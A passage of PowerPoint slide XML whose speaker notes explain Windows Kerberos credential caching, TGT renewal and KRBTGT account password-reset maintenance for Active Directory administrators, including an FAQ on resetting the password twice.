                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In Windows XP and Windows 2000 with Service Pack 2 or later, TGT renewal is triggered when the TGT is used within 5 minutes of its expiration. In Windows Server 2003, periodically the system will automatically renew expiring TGTs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1200"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The LSA also keeps a copy of an interactive user's hashed password. If the user's TGT expires during a logon session, the Kerberos SSP uses the LSA's copy of the hashed password to obtain a new TGT without interrupting the user's logon session. The password is not stored permanently on the computer, and the local copy of the hashed password is destroyed when the user's logon session is destroyed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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Hashed passwords for services and computers are handled differently than above. As in Windows NT, hashed passwords are stored in a secure area of the computer's registry. The registry is also used to store hashed passwords for user accounts on the local system, but local accounts are used only for access to computers in standalone mode, never for network access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3750038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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>On computers running Windows 2000, Windows XP, or Windows Server 2003, tickets and keys obtained from the KDC are stored in a credentials cache, an area of volatile memory protected by the LSA. The credentials cache is never paged to disk. All objects stored there are destroyed when a security principal logs off or when the system is shut down.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The credentials cache is managed by the Kerberos SSP, which runs in the LSA's security context. Whenever tickets and keys need to be obtained or renewed, the LSA calls the Kerberos SSP to accomplish the task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Segoe" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>In Windows XP and Windows 2000 with Service Pack 2 or later, TGT renewal is triggered when the TGT is used within 5 minutes of its expiration. In Windows Server 2003, periodically the system will automatically renew expiring TGTs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="en-US" sz="1200"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The LSA also keeps a copy of an interactive user's hashed password. If the user's TGT expires during a logon session, the Kerberos SSP uses the LSA's copy of the hashed password to obtain a new TGT without interrupting the user's logon session. The password is not stored permanently on the computer, and the local copy of the hashed password is destroyed when the user's logon session is destroyed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200"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Hashed passwords for services and computers are handled differently than above. As in Windows NT, hashed passwords are stored in a secure area of the computer's registry. The registry is also used to store hashed passwords for user accounts on the local system, but local accounts are used only for access to computers in standalone mode, never for network access.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23380386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noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KRBTGT account</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KRBTGT account is a local default account that acts as a service account for the Key Distribution Center (KDC) service. This account cannot be deleted, and the account name cannot be changed. The KRBTGT account cannot be enabled in Active Directory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KRBTGT is also the security principal name used by the KDC for a Windows Server domain, as specified by RFC 4120. The KRBTGT account is the entity for the KRBTGT security principal, and it is created automatically when a new domain is created.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Windows Server Kerberos authentication is achieved by the use of a special Kerberos ticket-granting ticket (TGT) enciphered with a symmetric key. This key is derived from the password of the server or service to which access is requested. The TGT password of the KRBTGT account is known only by the Kerberos service. In order to request a session ticket, the TGT must be presented to the KDC. The TGT is issued to the Kerberos client from the KDC. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KRBTGT account maintenance considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A strong password is assigned to the KRBTGT account automatically. Be sure that you change the password on a regular schedule. The password for the KDC account is used to derive a secret key for encrypting and decrypting the TGT requests that are issued. The password for a domain trust account is used to derive an inter-realm key for encrypting referral tickets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>On occasion, the KRBTGT account password requires a reset, for example, when an attempt to change the password on the KRBTGT account fails. In order to resolve this issue, you reset the KRBTGT user account password twice by using Active Directory Users and Computers. You must reset the password twice because the KRBTGT account stores only two of the most recent passwords in the password history. By resetting the password twice, you effectively clear all passwords from the password history.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Resetting the password requires you either to be a member of the Domain Admins group, or to have been delegated with the appropriate authority. In addition, you must be a member of the local Administrators group, or you must have been delegated the appropriate authority.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>After you reset the KRBTGT password, ensure that event ID 6 in the (Kerberos) Key-Distribution-Center event source is written to the System event log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Security considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>It is also a best practice to reset the KRBTGT account password to ensure that a newly restored domain controller does not replicate with a compromised domain controller. In this case, in a large forest recovery that is spread across multiple locations, you cannot guarantee that all domain controllers are shut down, and if they are shut down, they cannot be rebooted again before all of the appropriate recovery steps have been undertaken. After you reset the KRBTGT account, another domain controller cannot replicate this account password by using an old password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>An organization suspecting domain compromise of the KRBTGT account should consider the use of professional incident response services. The impact to restore the ownership of the account is domain-wide and labor intensive an should be undertaken as part of a larger recovery effort.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>The KRBTGT password is the key from which all trust in Kerberos chains up to. Resetting the KRBTGT password is similar to renewing the root CA certificate with a new key and immediately not trusting the old key, resulting in almost all subsequent Kerberos operations will be affected.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>For all account types (users, computers, and services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>All the TGTs that are already issued and distributed will be invalid because the DCs will reject them. These tickets are encrypted with the KRBTGT so any DC can validate them. When the password changes, the tickets become invalid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>All currently authenticated sessions that logged on users have established (based on their service tickets) to a resource (such as a file share, SharePoint site, or Exchange server) are good until the service ticket is required to re-authenticate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>NTLM authenticated connections are not affected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="0" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" kern="1200" noProof="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Important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Rebooting a computer is the only reliable way to recover functionality as this will cause both the computer account and user accounts to log back in again. Logging in again will request new TGTs that are valid with the new KRBTGT, correcting any KRBTGT related operational issues on that computer.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information how to resolve issues and potential issues from a compromised KRBTGT account, see Reset the KRBTGT account password.</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Read-only domain controllers and the KRBTGT account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Windows Server 2008 introduced the read-only domain controller (RODC). The RODC is advertised as the Key Distribution Center (KDC) for the branch office. The RODC uses a different KRBTGT account and password than the KDC on a writable domain controller when it signs or encrypts ticket-granting ticket (TGT) requests. After an account is successfully authenticated, the RODC determines if a user's credentials or a computer's credentials can be replicated from the writable domain controller to the RODC by using the Password Replication Policy.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the credentials are cached on the RODC, the RODC can accept that user's sign-in requests until the credentials change. When a TGT is signed with the KRBTGT account of the RODC, the RODC recognizes that it has a cached copy of the credentials. If another domain controller signs the TGT, the RODC forwards requests to a writable domain controller.</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FAQ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Question:</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Does the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> account use a password history of 2 even if the password history setting in a GPO for the domain is e.g. 10?</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Answer:</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account is not retaining a password history like other accounts; It retains to only 2 passwords (current, “N”, and previous, “N-1”).</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password is also automatically generated, so even if history is being used, the chance is nihil that the same auto generated password is being created.</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dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Question:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>What performance impact can be expected when changing the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> password (since decryption of the TGT will cost more time because decryption with 2 passwords have to be checked)? This impact I think is for validation of all TGTs by a domain controller, but can this cause severe performance issues?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Answer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>TGT decryption is not being done via 2 passwords, but merely the 'current' or 'previous' (N-1) passwords remain valid for TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>decryption.Resetting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> the password once does not impact the business. New tickets are encrypted with this password. Old tickets are decrypted with the N-1 password. To mitigate a "Pass the hash" attack, we recommend to: - Reset once;- Await full AD replication;- This will result in no new tickets being encrypted with the previous password (N-1);- Await till all tickets have expired: This is 10 hours default; &lt;- This is important. If you don't, you will "invalidate" all current TGT tickets, and authentication issues will appear.- Allow twice the maximum allowed clock skew (2 * 5 minutes), before doing the second reset;   This will render the 'compromised' password to be N-2, thus not usable for TGT encryption / decryption. Since we waited for TGT expiration (10 hours) + 10 minutes + AD replication, all currently used tickets are encrypted with the 'new' N-password of the KRBTGT account. When doing the second reset, this N will become N-1, and a new "N" is being </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>set.As</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> both N and N-1 passwords can be used for TGT decryption, no performance impact is expected.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>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Question:</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Is a recovery using an old password for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> account useful / possible (e.g. when TGTs become invalid because of two password resets of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>kbrtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> account too soon after each other)? If we reset the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> password on a regular basis this (reset of the password too soon after the previous reset) could happen accidentally causing all TGTs to become invalid in the domain. Can resetting the password to a previous one help in such a case?</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Answer:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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Krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> uses a password of N-1, so, tickets issued with the current and the previous password are valid.</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reset the password, the new one you write is ignored (discarded) and the system automatically sets a new (and complex) one. This is due to security reasons. Therefore, there is no way to set back an 'old' value.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CD0E444A-B36E-400A-A8D6-1C82AC119240}" type="slidenum">
              <a:rPr lang="en-AU" smtClean="0"/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29713641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pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>With the release of Windows 2000, Active Directory domains became the implementation of Kerberos realms.</a:t>
            </a:r>
          </a:p>
          <a:p>
